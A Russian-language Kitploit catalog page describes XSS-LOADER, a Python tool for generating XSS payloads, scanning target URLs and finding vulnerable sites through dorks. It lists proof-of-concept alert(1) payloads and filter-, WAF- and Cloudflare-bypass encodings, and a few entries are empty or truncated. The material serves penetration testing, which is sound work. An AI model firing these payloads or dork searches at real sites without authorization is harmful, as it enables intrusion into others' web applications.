Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
XSS-LOADER — Xss Генератор нагрузок ~ Xss Сканер ~ Xss Поиск дорков | Kitploit
Инструменты/GitHubGitHub/capture0x/xss-loader
Сканеры веб-уязвимостейГенерация полезной нагрузкиЭксплуатация веб-приложенийОбход WAFТестирование на Проникновение
GitHubcapture0x/xss-loader

XSS-LOADER

Xss Генератор нагрузок ~ Xss Сканер ~ Xss Поиск дорков

Репозиторий
6211233 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

💎   XSS-LOADER ИНСТРУМЕНТЫ   💎

Автор: TMRSWRR

Version 1.0.0

Все в одном инструменте для XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER

Instagram: TMRSWRR

📷 Скриншоты 📷

👇 💌 Как использовать 💌 👇

Как использовать

📒 Прочти меня 📒

  • Этот инструмент создает полезную нагрузку для использования в XSS-инъекциях
  • Выберите теги по умолчанию из параметра или напишите свою полезную нагрузку
  • Он выполняет XSS-инъекции с помощью параметра Xss Scanner
  • Он находит URL уязвимых сайтов с помощью параметра Xss Dork Finder

💿 Установка 💿

Установка с помощью requirements.txt

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Использование

root@kitploit:~
python3 payloader.py

🗃️ Возможности 🗃️

*Basic Payload

Устанавливает параметр по умолчанию: <script>alert(1)</script>

*Div Payload

Устанавливает параметр по умолчанию: <div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload

Устанавливает параметр по умолчанию: ``````

*Body Payload

Устанавливает параметр по умолчанию: <body ontouchstart=alert(1)>

*Svg Payload

Устанавливает параметр по умолчанию: <svg onload=alert('1')>

*Enter Your Payload

Кодирует полезную нагрузку, написанную пользователем

*Payload Generator Parameter

Кодирует полезную нагрузку на выбранном теге

root@kitploit:~
* |   1.  ВЕРХНИЙ РЕГИСТР---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  ВЕРХНИЙ И НИЖНИЙ РЕГИСТР----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL-КОДИРОВАНИЕ ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  КОДИРОВАНИЕ HTML СУЩНОСТЕЙ----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  РАЗДЕЛЕНИЕ ПОЛЕЗНОЙ НАГРУЗКИ ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX-КОДИРОВАНИЕ ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 КОДИРОВАНИЕ -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 КОДИРОВАНИЕ----->  Encode payload to utf-32 format.          
* |   9.  УДАЛЕНИЕ ТЕГА -----> ";alert('XSS');//            
* |  10.  UNICODE-КОДИРОВАНИЕ----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII КОДИРОВАНИЕ ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 КОДИРОВАНИЕ ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 КОДИРОВАНИЕ ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  ОБХОД СКОБОК ----->  <script>alert`1`</script>   
* |  15.  UTF-8 КОДИРОВАНИЕ ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  ВЫХОД ЗА ПРЕДЕЛЫ ТЕГА-----> "><script>alert(1)</script>
* |  17.  ВЫХОД ЗА ПРЕДЕЛЫ СКРИПТА----->  </script><script>alert(1)</script>
* |  18.  ПОЛЕЗНАЯ НАГРУЗКА ДЛЯ ЗАГРУЗКИ ФАЙЛА-----> "><script>alert(1)</script>.gif
* |  19.  ОБХОД ВНУТРИ КОММЕНТАРИЕВ-----> <!--><script>alert(1)</script>-->
* |  20.  МУТАЦИОННАЯ ПОЛЕЗНАЯ НАГРУЗКА-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  НЕПРАВИЛЬНЫЙ IMG-----> <script>alert(1)</script>">
* |  22.  ОБХОД ПРОБЕЛОВ-----> 
* |  23.  СКРЫТЫЙ БЛОК DOWNLEVEL-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  ПОЛЕЗНЫЕ НАГРУЗКИ ДЛЯ ОБХОДА WAF-----> Show Waf Bypass Payload List
* |  25.  ПОЛЕЗНЫЕ НАГРУЗКИ ДЛЯ ОБХОДА CLOUDFLARE-----> Show Cloudflare Bypass Payload List
* |  26.  ПОЛЕЗНЫЕ НАГРУЗКИ POLYGLOT-----> Show Polyglot Bypass Payload List
* |  27.  ПОЛЕЗНЫЕ НАГРУЗКИ ALERT-----> Show Alert Payload List
* |  28.  СОЗДАТЬ ВСЕ ПОЛЕЗНЫЕ НАГРУЗКИ-----> Show Create All Payloads
* |  29.  ВЕРНУТЬСЯ В ГЛАВНОЕ МЕНЮ
* |  30.  ВЫХОД

*Xss Scanner

Сначала вам нужно ввести URL цели Пожалуйста, введите URL как в этом примере: например, target -----> http://target.com/index.php?name= Выбранный список полезных нагрузок для сканирования

  • BASIC PAYLOAD LIST ==> Список полезных нагрузок, состоящий из тега script
  • DIV PAYLOAD LIST ==> Список полезных нагрузок, состоящий из тега div
  • IMG PAYLOAD LIST ==> Список полезных нагрузок, состоящий из тега img
  • BODY PAYLOAD LIST ==> Список полезных нагрузок, состоящий из тега body
  • SVG PAYLOAD LIST ==> Список полезных нагрузок, состоящий из тега svg
  • MIXED PAYLOAD LIST ==> Список полезных нагрузок, состоящий из всех тегов
  • ENTER FILE PATH ==> Список полезных нагрузок, определяемый пользователем. Пожалуйста, введите URL как в этом примере..! (например, path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Результаты будут добавлены в файл "vulnpayload.txt" после сканирования.

*Xss Dork Finder

Сначала введите дорк для поиска: например: inurl:"search.php?q=" Результаты будут сохранены в файл "dork.txt" после сканирования.

Известные проблемы

Исправлено:

  • Ошибки Unicode

  • Ошибки модулей

Важно:

Если вы хотите использовать инструмент с Python3, установленным на Windows, скачайте по ссылке ниже:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

Ошибки и улучшения

Для сообщений об ошибках или улучшениях, пожалуйста, откройте issue здесь.

Авторское право 2020

Скачать инструмент